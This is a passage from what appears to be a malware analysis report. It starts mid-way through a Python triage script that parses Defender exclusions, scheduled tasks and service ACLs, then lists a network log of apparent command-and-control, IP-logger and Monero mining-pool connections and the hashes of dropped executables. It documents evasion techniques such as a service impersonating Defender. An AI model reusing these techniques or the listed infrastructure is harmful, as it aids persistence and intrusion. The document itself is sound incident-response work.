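    if not m or "D:" not in m["sddl"]:
        return None
    dacl = m["sddl"].split("D:", 1)[1].split("S:", 1)[0]  # keep the DACL, drop the SACL
    return {"service": m["service"],
            "aces": [{"type": a["type"], "trustee": a["sid"], "rights": decode_rights(a["rights"])}
                     for a in ACE_RE.finditer(dacl)]}

def effective_rights(parsed, trustee):
    """Allow ACEs minus explicit deny ACEs for one trustee (ACE order ignored; enough for triage)."""
    allowed, denied = set(), set()
    for a in parsed["aces"]:
        if a["trustee"] == trustee:
            (allowed if a["type"] == "A" else denied).update(a["rights"])
    return allowed - denied

def triage(cmdlines):
    """Run all three parsers and add the flags that matter for response."""
    findings = {"exclusions": parse_defender_exclusions(cmdlines), "tasks": [], "services": []}
    for line in cmdlines:
        task = parse_task_create(line)
        if task:
            findings["tasks"].append(task)
        svc = parse_sdset(line)
        if svc:
            trustees = {a["trustee"] for a in svc["aces"]}
            svc["explicit_deny"] = [{"trustee": a["trustee"], "rights": a["rights"]}
                                    for a in svc["aces"] if a["type"] == "D"]
            svc["can_stop"] = sorted(t for t in trustees if "STOP" in effective_rights(svc, t))
            # Whoever keeps WRITE_DAC or WRITE_OWNER can rewrite the descriptor and regain control.
            svc["can_repair_dacl"] = sorted(
                t for t in trustees if {"WRITE_DAC", "WRITE_OWNER"} & effective_rights(svc, t))
            findings["services"].append(svc)
    return findings

if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_CMDLINES), indent=2))
```

Running the block prints the findings as JSON. Three things in the output drive remediation: the same exclusion is written under both the policy and the local key and in both registry views, so a cleanup that only runs Remove-MpPreference or only inspects one view misses part of it; the BA allow ACE still carries WRITE_DAC and WRITE_OWNER, so an administrator can reset the descriptor with sc sdset and then stop the service, the denial only covers stop and pause/continue; and the service name WinDefender with its binary C:\Windows\windefender.exe is a look-alike of the real Microsoft Defender Antivirus service, which is WinDefend running MsMpEng.exe, so a hunt should key on the exact service name and image path.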

Network

Country Destination Domain Proto
RU 193.233.255.73:80 193.233.255.73 tcp
US 8.8.8.8:53 www.facebook.com udp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 accounts.google.com udp
FI 77.91.68.29:80 77.91.68.29 tcp
RU 193.233.255.73:80 193.233.255.73 tcp
FI 77.91.68.249:80 77.91.68.249 tcp
NL 142.251.36.45:443 accounts.google.com tcp
NL 142.251.36.45:443 accounts.google.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 142.251.36.45:443 accounts.google.com tcp
NL 142.251.36.45:443 accounts.google.com tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
TR 185.216.70.222:80 tcp
US 8.8.8.8:53 static.xx.fbcdn.net udp
US 8.8.8.8:53 facebook.com udp
NL 157.240.201.35:443 facebook.com tcp
NL 157.240.201.35:443 facebook.com tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 fbcdn.net udp
NL 157.240.201.35:443 fbcdn.net tcp
NL 157.240.201.35:443 fbcdn.net tcp
US 8.8.8.8:53 fbsbx.com udp
NL 157.240.201.35:443 fbsbx.com tcp
NL 157.240.201.35:443 fbsbx.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
US 8.8.8.8:53 accounts.youtube.com udp
NL 142.250.179.206:443 accounts.youtube.com tcp
NL 142.250.179.206:443 accounts.youtube.com tcp
US 8.8.8.8:53 play.google.com udp
FI 77.91.68.29:80 77.91.68.29 tcp
RU 5.42.65.80:80 5.42.65.80 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.1:80 77.91.124.1 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.124.71:4341 tcp
NL 81.161.229.93:80 81.161.229.93 tcp
BG 171.22.28.213:80 171.22.28.213 tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
RU 85.209.11.85:41140 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 iplogger.com udp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
NL 195.123.218.98:80 tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
DE 148.251.234.93:443 iplogger.com tcp
FI 77.91.124.86:19084 tcp
DE 148.251.234.93:443 iplogger.com tcp
NL 195.123.218.98:80 tcp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 e28f51ae-893b-443b-a960-03ad84c5fab8.uuid.allstatsin.ru udp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
US 95.214.26.34:80 host-host-file8.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
DE 31.192.237.75:80 tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.79.68:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
NL 194.169.175.235:42691 tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
DE 31.192.237.75:80 tcp
US 8.8.8.8:53 datasheet.fun udp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard58.blob.core.windows.net udp
US 20.150.38.228:443 vsblobprodscussu5shard58.blob.core.windows.net tcp
DE 148.251.234.93:443 iplogger.com tcp
FI 77.91.124.1:80 77.91.124.1 tcp
DE 148.251.234.93:443 iplogger.com tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
NL 51.15.65.182:14433 xmr-eu1.nanopool.org tcp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
FR 51.255.34.118:14433 xmr-eu1.nanopool.org tcp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 server5.allstatsin.ru udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 stun.l.google.com udp
BG 185.82.216.104:443 server5.allstatsin.ru tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 walkinglate.com udp
US 188.114.97.0:443 walkinglate.com tcp
US 74.125.128.127:19302 stun.l.google.com udp
US 8.8.8.8:53 iplogger.com udp
DE 148.251.234.93:443 iplogger.com tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
FR 51.159.66.125:53 aicnbze.ru udp
BG 185.141.63.172:80 aicnbze.ru tcp
US 8.8.8.8:53 server5.allstatsin.ru udp
DE 148.251.234.93:443 iplogger.com tcp
BG 185.82.216.104:443 server5.allstatsin.ru tcp
BG 185.82.216.104:443 server5.allstatsin.ru tcp
DE 148.251.234.93:443 iplogger.com tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 iplogger.com udp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 service-domain.xyz udp

Files

\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe

MD5 ebbfdd3142cd932c64243266942df005
SHA1 db53a3b003df5acddf557eaf1f234d4b9a30925d
SHA256 ab352a642081b63b9dc26490ee837dbd75d05e84a82fe64c1e6d98824c6c3c04
SHA512 f12f85ca407c8c95e93ea82fd89eb4538da056bbfc814ce5e5ea660e159f57bdb4fd7fdc81d4b92e93176063617de8c31c5f0f99cb4145c989f1f35c74eef649

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe

MD5 ebbfdd3142cd932c64243266942df005
SHA1 db53a3b003df5acddf557eaf1f234d4b9a30925d
SHA256 ab352a642081b63b9dc26490ee837dbd75d05e84a82fe64c1e6d98824c6c3c04
SHA512 f12f85ca407c8c95e93ea82fd89eb4538da056bbfc814ce5e5ea660e159f57bdb4fd7fdc81d4b92e93176063617de8c31c5f0f99cb4145c989f1f35c74eef649

\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe

MD5 b0eeae69b80888ff98dc8649c767b7d2
SHA1 ae98630ac50e7aaaa5d0fa7da72b52817ef39001
SHA256 d86f8ffa3cfb45b0ae5e143d2fd07e73e499e81fdf3761879030010e695abd6e
SHA512 79f83eb8877b939788d2694895fcac08886cb28bfa70e639a5312f15793fee4dd2e1f40b8f68a6abbdea46b49806b25dc1abf4aab0ef4f77bf23fe82abe62ae0

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe

MD5 b0eeae69b80888ff98dc8649c767b7d2
SHA1 ae98630ac50e7aaaa5d0fa7da72b52817ef39001
SHA256 d86f8ffa3cfb45b0ae5e143d2fd07e73e499e81fdf3761879030010e695abd6e
SHA512 79f83eb8877b939788d2694895fcac08886cb28bfa70e639a5312f15793fee4dd2e1f40b8f68a6abbdea46b49806b25dc1abf4aab0ef4f77bf23fe82abe62ae0

\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe

MD5 243758911f0cc3ab8e68cab2f08352e1
SHA1 e565aa389fc39944e5480422aff8add698eac921
SHA256 7b4ac23836c12a2561af7be8a35bb1a0c710d2c625f4c84cf860a2a362b2333d
SHA512 4a0f4fb9758a3de8730ff8901bd6c131d7892499dd49875e109a0bf3e489fa085eb0c10e7701692efb945339bf33c1356679cb821b8995ad625dc08fb809dd5d

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe

MD5 243758911f0cc3ab8e68cab2f08352e1
SHA1 e565aa389fc39944e5480422aff8add698eac921
SHA256 7b4ac23836c12a2561af7be8a35bb1a0c710d2c625f4c84cf860a2a362b2333d
SHA512 4a0f4fb9758a3de8730ff8901bd6c131d7892499dd49875e109a0bf3e489fa085eb0c10e7701692efb945339bf33c1356679cb821b8995ad625dc08fb809dd5d

\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe

MD5 00081a3830d97a88bd9640af4752d0fb
SHA1 2d9a67b149f1751c25695f69e51e213fb3dfe5bc
SHA256 cfcd5f938cffdaa06209d233883b4003a926884976ce0b8379ef87ce55694b28
SHA512 be91caf4dc8ca06a4cf6a2cc2b1cd46ce67dd1f50f64e21d7204c2a99246b0d3fce5a9689f459333ee8b13f22e41c61fadf3f6f268f23c1fc8711fb741bfdbd4

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe

MD5 00081a3830d97a88bd9640af4752d0fb
SHA1 2d9a67b149f1751c25695f69e51e213fb3dfe5bc
SHA256 cfcd5f938cffdaa06209d233883b4003a926884976ce0b8379ef87ce55694b28
SHA512 be91caf4dc8ca06a4cf6a2cc2b1cd46ce67dd1f50f64e21d7204c2a99246b0d3fce5a9689f459333ee8b13f22e41c61fadf3f6f268f23c1fc8711fb741bfdbd4

\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe

MD5 29e9546e7fe835b413a5d65599213b53
SHA1 64d6d2eca4e197a390702a08b074c5ef6da2fa32
SHA256 d65b10dc2c1598935786fd0d562aaee9c9fc6b7d6f950da6de13db6686cab814
SHA512 e556877abd79052f3d3bc6175971001531f363745d396aa96302218cf11b4fc94980f946aae758ff14d8cc8af4d9dcb26503142e2d1cded2d21ab37ddc009658

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe

MD5 29e9546e7fe835b413a5d65599213b53
SHA1 64d6d2eca4e197a390702a08b074c5ef6da2fa32
SHA256 d65b10dc2c1598935786fd0d562aaee9c9fc6b7d6f950da6de13db6686cab814
SHA512 e556877abd79052f3d3bc6175971001531f363745d396aa96302218cf11b4fc94980f946aae758ff14d8cc8af4d9dcb26503142e2d1cded2d21ab37ddc009658

memory/2616-53-0x0000000000400000-0x000000000040A000-memory.dmp

memory/2616-55-0x0000000000400000-0x000000000040A000-memory.dmp

memory/2616-57-0x0000000000400000-0x000000000040A000-memory.dmp

memory/2616-59-0x0000000000400000-0x000000000040A000-memory.dmp

memory/2616-62-0x0000000000400000-0x000000000040A000-memory.dmp

memory/2616-61-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2616-64-0x0000000000400000-0x000000000040A000-memory.dmp

memory/2616-66-0x0000000000400000-0x000000000040A000-memory.dmp

\Users\Admin\AppData\Local\Temp\IXP004.TMP\2CQ7657.exe

MD5 9d21324168c3c2362fcf52cbfbb8f337
SHA1 86244bccc47c6a77cdcd3c89e2a5d5c6557bc531
SHA256 3078cf0f4279bc87894b07e7264f4c1fdf69103f0a0658179c6aaddf226bc6d6
SHA512 a3091b1c493056050da7982a20286776d65a99ea722c68144d7e7f8d82cf4148d5195e833527e55b19e103672c5775948d2a77b972f93ff7afca299766a3f6e3

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2CQ7657.exe

MD5 9d21324168c3c2362fcf52cbfbb8f337
SHA1 86244bccc47c6a77cdcd3c89e2a5d5c6557bc531
SHA256 3078cf0f4279bc87894b07e7264f4c1fdf69103f0a0658179c6aaddf226bc6d6
SHA512 a3091b1c493056050da7982a20286776d65a99ea722c68144d7e7f8d82cf4148d5195e833527e55b19e103672c5775948d2a77b972f93ff7afca299766a3f6e3

memory/2324-79-0x0000000000320000-0x0000000000329000-memory.dmp

memory/2324-83-0x0000000000320000-0x0000000000329000-memory.dmp

\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe

MD5 6296c10a63e82660fa617573334bc624
SHA1 5c7a43559032b3e693cdc5b92f3b6b58a4cf0313
SHA256 ab00c5349f537aa72c4357cb9fd2e0b30ecc59f6f3ae8830a6738ead9e3547ef
SHA512 9582e02fddb59e5f4ce80579cc73ebea6d6c37e1886fc3d27c517ea4828e7057da8c7e973255562b587573d6f53752b684f14a25cf280e3ce320027bac593ca0

memory/2552-84-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe

MD5 6296c10a63e82660fa617573334bc624
SHA1 5c7a43559032b3e693cdc5b92f3b6b58a4cf0313
SHA256 ab00c5349f537aa72c4357cb9fd2e0b30ecc59f6f3ae8830a6738ead9e3547ef
SHA512 9582e02fddb59e5f4ce80579cc73ebea6d6c37e1886fc3d27c517ea4828e7057da8c7e973255562b587573d6f53752b684f14a25cf280e3ce320027bac593ca0

memory/2552-86-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1304-85-0x00000000029B0000-0x00000000029C6000-memory.dmp

\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe

MD5 73c0a9983b33575b4e66cd91f2e8778c
SHA1 49cce232b6b07b8789984646d8c5753ab7d0a534
SHA256 48f5b3c7e43089309550508a46e4854af5338ac6378b0cdbe84d6b8da251754f
SHA512 a9c6c567b9077ac4faa38909f4a594134aec27808e3949e7aff8454d1ab22e92f245d990327ab6bb3e31176cc14ef531aee51f0970318a6f0d22bffc7acbfb7f

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe

MD5 73c0a9983b33575b4e66cd91f2e8778c
SHA1 49cce232b6b07b8789984646d8c5753ab7d0a534
SHA256 48f5b3c7e43089309550508a46e4854af5338ac6378b0cdbe84d6b8da251754f
SHA512 a9c6c567b9077ac4faa38909f4a594134aec27808e3949e7aff8454d1ab22e92f245d990327ab6bb3e31176cc14ef531aee51f0970318a6f0d22bffc7acbfb7f

memory/592-99-0x0000000000400000-0x000000000043E000-memory.dmp

memory/592-101-0x0000000000400000-0x000000000043E000-memory.dmp

memory/592-102-0x0000000000400000-0x000000000043E000-memory.dmp

memory/592-104-0x0000000000400000-0x000000000043E000-memory.dmp

memory/592-107-0x0000000000400000-0x000000000043E000-memory.dmp

memory/592-109-0x0000000000400000-0x000000000043E000-memory.dmp

memory/592-111-0x0000000000400000-0x000000000043E000-memory.dmp

memory/1304-112-0x000007FEF5A30000-0x000007FEF5B73000-memory.dmp

memory/1304-113-0x000007FF33330000-0x000007FF3333A000-memory.dmp

\Users\Admin\AppData\Local\Temp\IXP001.TMP\5tZ8WP7.exe

MD5 945b3260eb11be98187c7def50510674
SHA1 15338cc329d91e2a9f6bc1e1a82db5213ff1247e
SHA256 4be628a8638030f47a996ae951eb5eda962fc1d9dc2c53dc603e49807e1a2e20
SHA512 d5993bd7c4900d021f2cb69878c0dc4c55f39dcecbf05d3e4785da69924a2b7973ceaba70a097fa4dbcae156c0b83a63d5004d23938527384f65a580d0e3ee71

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5tZ8WP7.exe

MD5 945b3260eb11be98187c7def50510674
SHA1 15338cc329d91e2a9f6bc1e1a82db5213ff1247e
SHA256 4be628a8638030f47a996ae951eb5eda962fc1d9dc2c53dc603e49807e1a2e20
SHA512 d5993bd7c4900d021f2cb69878c0dc4c55f39dcecbf05d3e4785da69924a2b7973ceaba70a097fa4dbcae156c0b83a63d5004d23938527384f65a580d0e3ee71

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 945b3260eb11be98187c7def50510674
SHA1 15338cc329d91e2a9f6bc1e1a82db5213ff1247e
SHA256 4be628a8638030f47a996ae951eb5eda962fc1d9dc2c53dc603e49807e1a2e20
SHA512 d5993bd7c4900d021f2cb69878c0dc4c55f39dcecbf05d3e4785da69924a2b7973ceaba70a097fa4dbcae156c0b83a63d5004d23938527384f65a580d0e3ee71

\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 945b3260eb11be98187c7def50510674
SHA1 15338cc329d91e2a9f6bc1e1a82db5213ff1247e
SHA256 4be628a8638030f47a996ae951eb5eda962fc1d9dc2c53dc603e49807e1a2e20
SHA512 d5993bd7c4900d021f2cb69878c0dc4c55f39dcecbf05d3e4785da69924a2b7973ceaba70a097fa4dbcae156c0b83a63d5004d23938527384f65a580d0e3ee71

memory/3040-130-0x00000000000F0000-0x000000000010E000-memory.dmp

memory/3040-136-0x00000000000F0000-0x000000000010E000-memory.dmp

\Users\Admin\AppData\Local\Temp\IXP000.TMP\6If0Yv8.exe

MD5 54a5f52dfb5a0dabc2b6335af42e1719
SHA1 76aca91248877769d0be7445b5fdda7d5ab55add
SHA256 cadc96c04a508787bf1b23225238fe445e4794468323b5d765e2ffc41b46d38f
SHA512 abff717aee6c4248adecb5467ccc66ef39983e32771e4b08cc033d7aade45234318edaafabb2acb0c1aa701e1e6eef3dd2128c1734dfbf241a96d9459e774f9b

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6If0Yv8.exe

MD5 54a5f52dfb5a0dabc2b6335af42e1719
SHA1 76aca91248877769d0be7445b5fdda7d5ab55add
SHA256 cadc96c04a508787bf1b23225238fe445e4794468323b5d765e2ffc41b46d38f
SHA512 abff717aee6c4248adecb5467ccc66ef39983e32771e4b08cc033d7aade45234318edaafabb2acb0c1aa701e1e6eef3dd2128c1734dfbf241a96d9459e774f9b

memory/2736-141-0x0000000000020000-0x000000000003E000-memory.dmp

memory/2736-142-0x0000000000400000-0x000000000041E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 945b3260eb11be98187c7def50510674
SHA1 15338cc329d91e2a9f6bc1e1a82db5213ff1247e
SHA256 4be628a8638030f47a996ae951eb5eda962fc1d9dc2c53dc603e49807e1a2e20
SHA512 d5993bd7c4900d021f2cb69878c0dc4c55f39dcecbf05d3e4785da69924a2b7973ceaba70a097fa4dbcae156c0b83a63d5004d23938527384f65a580d0e3ee71

C:\Users\Admin\AppData\Local\Temp\C17B.tmp\C17C.tmp\C17D.bat

MD5 dec89e5682445d71376896eac0d62d8b
SHA1 c5ae3197d3c2faf3dea137719c804ab215022ea6
SHA256 c3dea90ca98985007f0de66bf0197fdcd2d4a35e365135bf37a18a4895d81668
SHA512 b746b79120d2ff8a9f3327b0bed99c70339155ea831c1eb9f412056fc8de36a0e3005378ba9102bd25ce6cc24fe1171f1a9c8453f33a9bcd6dd59e9ad0f8e186

memory/2736-211-0x0000000000400000-0x000000000041E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\D2D9.exe

MD5 6130ad0c68918a3212bd0083f30dd172
SHA1 9620e3e3ca045d34cae7901fdc91fd35aaabf7d6
SHA256 362bd0e9f5346c3885529917b20385a865cae8420317575347ae7154044fb929
SHA512 8f288bd9c117fdc46009210cba9449948e866b633dd2e01030c2147b6cde034bd6f4b27336b9474ccdd99d9c02e642b13251dc03a1e401212e29d4435f68cf30

C:\Users\Admin\AppData\Local\Temp\D2D9.exe

MD5 6130ad0c68918a3212bd0083f30dd172
SHA1 9620e3e3ca045d34cae7901fdc91fd35aaabf7d6
SHA256 362bd0e9f5346c3885529917b20385a865cae8420317575347ae7154044fb929
SHA512 8f288bd9c117fdc46009210cba9449948e866b633dd2e01030c2147b6cde034bd6f4b27336b9474ccdd99d9c02e642b13251dc03a1e401212e29d4435f68cf30

\Users\Admin\AppData\Local\Temp\D2D9.exe

MD5 6130ad0c68918a3212bd0083f30dd172
SHA1 9620e3e3ca045d34cae7901fdc91fd35aaabf7d6
SHA256 362bd0e9f5346c3885529917b20385a865cae8420317575347ae7154044fb929
SHA512 8f288bd9c117fdc46009210cba9449948e866b633dd2e01030c2147b6cde034bd6f4b27336b9474ccdd99d9c02e642b13251dc03a1e401212e29d4435f68cf30

C:\Users\Admin\AppData\Local\Temp\FB51.exe

MD5 e561df80d8920ae9b152ddddefd13c7c
SHA1 0d020453f62d2188f7a0e55442af5d75e16e7caf
SHA256 5484ca53027230772ae149e3d7684b7e322432ceb013b6bc2440bd3c269192ea
SHA512 a7afed5a6434f296f0e0186de8ce87245bbd0f264498e327188a93551dd45e0e67409e62f3477b526ab5b0927e4349ad66107cbea7f7554b4be53c18227741a5

C:\Users\Admin\AppData\Local\Temp\FE3E.bat

MD5 403991c4d18ac84521ba17f264fa79f2
SHA1 850cc068de0963854b0fe8f485d951072474fd45
SHA256 ef6e942aefe925fefac19fa816986ea25de6935c4f377c717e29b94e65f9019f
SHA512 a20aaa77065d30195e5893f2ff989979383c8d7f82d9e528d4833b1c1236aef4f85284f5250d0f190a174790b650280ffe1fbff7e00c98024ccf5ca746e5b576

C:\Users\Admin\AppData\Local\Temp\FE3E.bat

MD5 403991c4d18ac84521ba17f264fa79f2
SHA1 850cc068de0963854b0fe8f485d951072474fd45
SHA256 ef6e942aefe925fefac19fa816986ea25de6935c4f377c717e29b94e65f9019f
SHA512 a20aaa77065d30195e5893f2ff989979383c8d7f82d9e528d4833b1c1236aef4f85284f5250d0f190a174790b650280ffe1fbff7e00c98024ccf5ca746e5b576

\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe

MD5 6694709825eea0bd12bdb087083e4e45
SHA1 ddb64444fe5d812731a143068d6106652183806d
SHA256 92432086d1205470c2a9f71ccf6523c7ebef055ae8d7a9d722734b03e943d6bc
SHA512 9fada16a2b45b638b327c734cf528f0310b13e4667c5cc5dfc70c641864476e63368dfd9edd3752a80750cbf3f4371384bcd35e685fc6f4b46a3b600b0ce3f9e

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe

MD5 6694709825eea0bd12bdb087083e4e45
SHA1 ddb64444fe5d812731a143068d6106652183806d
SHA256 92432086d1205470c2a9f71ccf6523c7ebef055ae8d7a9d722734b03e943d6bc
SHA512 9fada16a2b45b638b327c734cf528f0310b13e4667c5cc5dfc70c641864476e63368dfd9edd3752a80750cbf3f4371384bcd35e685fc6f4b46a3b600b0ce3f9e

\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe

MD5 6694709825eea0bd12bdb087083e4e45
SHA1 ddb64444fe5d812731a143068d6106652183806d
SHA256 92432086d1205470c2a9f71ccf6523c7ebef055ae8d7a9d722734b03e943d6bc
SHA512 9fada16a2b45b638b327c734cf528f0310b13e4667c5cc5dfc70c641864476e63368dfd9edd3752a80750cbf3f4371384bcd35e685fc6f4b46a3b600b0ce3f9e

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe

MD5 6694709825eea0bd12bdb087083e4e45
SHA1 ddb64444fe5d812731a143068d6106652183806d
SHA256 92432086d1205470c2a9f71ccf6523c7ebef055ae8d7a9d722734b03e943d6bc
SHA512 9fada16a2b45b638b327c734cf528f0310b13e4667c5cc5dfc70c641864476e63368dfd9edd3752a80750cbf3f4371384bcd35e685fc6f4b46a3b600b0ce3f9e

\Users\Admin\AppData\Local\Temp\IXP003.TMP\vk8qw0bZ.exe

MD5 a5e38a1b6abb207a173fd0e9fdb609bf
SHA1 19a0734579c3ef59e5836801a69b5389a2c0f2ee
SHA256 9ff938b361f07d3ebcc44b6a73ccf148d90446f26d3fc7c5490b78864bd33ce0
SHA512 06697cbbbe50ea8a996def043a533acfb6f55ec095aa1e2f9f80108dc9d0fcba4a2717fb0567611275c15e43b4ace2df2cdb588246f7574bc81283796afffc2c

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\vk8qw0bZ.exe

MD5 a5e38a1b6abb207a173fd0e9fdb609bf
SHA1 19a0734579c3ef59e5836801a69b5389a2c0f2ee
SHA256 9ff938b361f07d3ebcc44b6a73ccf148d90446f26d3fc7c5490b78864bd33ce0
SHA512 06697cbbbe50ea8a996def043a533acfb6f55ec095aa1e2f9f80108dc9d0fcba4a2717fb0567611275c15e43b4ace2df2cdb588246f7574bc81283796afffc2c

\Users\Admin\AppData\Local\Temp\IXP003.TMP\vk8qw0bZ.exe

MD5 a5e38a1b6abb207a173fd0e9fdb609bf
SHA1 19a0734579c3ef59e5836801a69b5389a2c0f2ee
SHA256 9ff938b361f07d3ebcc44b6a73ccf148d90446f26d3fc7c5490b78864bd33ce0
SHA512 06697cbbbe50ea8a996def043a533acfb6f55ec095aa1e2f9f80108dc9d0fcba4a2717fb0567611275c15e43b4ace2df2cdb588246f7574bc81283796afffc2c

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\vk8qw0bZ.exe

MD5 a5e38a1b6abb207a173fd0e9fdb609bf
SHA1 19a0734579c3ef59e5836801a69b5389a2c0f2ee
SHA256 9ff938b361f07d3ebcc44b6a73ccf148d90446f26d3fc7c5490b78864bd33ce0
SHA512 06697cbbbe50ea8a996def043a533acfb6f55ec095aa1e2f9f80108dc9d0fcba4a2717fb0567611275c15e43b4ace2df2cdb588246f7574bc81283796afffc2c

\Users\Admin\AppData\Local\Temp\IXP004.TMP\TM0pC3TM.exe

MD5 32a7b19e0b5404d3f34ca4e763523f63
SHA1 20f4524e2414f9397da9183aef06d81a356f1064
SHA256 95797312f9dcd24692402f4cc1de68b105c8f015a6e40ed9c9390e5e12e66817
SHA512 7120f447ed74c95e6ce234b1cc0aaf1e752a1cc987bdc18b4f0c6f17398dafca2b9afcc42045eeb0bf138b9e3579128740d480cd108ee50ce29a9cc748ed1191

memory/656-267-0x0000000001260000-0x000000000129E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3xG0Vd50.exe

MD5 a2120e85849713d92e29eac8dc8d1ee8
SHA1 ad8cc2d48abc4add8fe0351d7475a18cc8d46221
SHA256 d28dc56b23ec42685abb9d41c963e8abfdc442d8cb3a4f186f3d61fa4f6e2509
SHA512 fae547c32e3b740d1e83e9d0d98f0bb2ddee24fcfdc0bd8458108117a367986b2278a1161cf977dfa5714da5f96eaf4d3650c5613b72bf2200c77a85a90606bf

C:\Users\Admin\AppData\Local\Temp\18A.exe

MD5 73089952a99d24a37d9219c4e30decde
SHA1 8dfa37723afc72f1728ec83f676ffeac9102f8bd
SHA256 9aa54a5b73fe93d789ec1707ebd41ff824fcf6ba34b18d97ebc566cee8cbce60
SHA512 7088b995c0f6425ad4460b1f286d36e5b7ca3d79308febfac7f212e630b00569239e0b22455198739d20b1fbae1b70c24c22f41a34bab19a793aaa31164aa2d2

C:\Users\Admin\AppData\Local\Temp\Cab2D0.tmp

MD5 f3441b8572aae8801c04f3060b550443
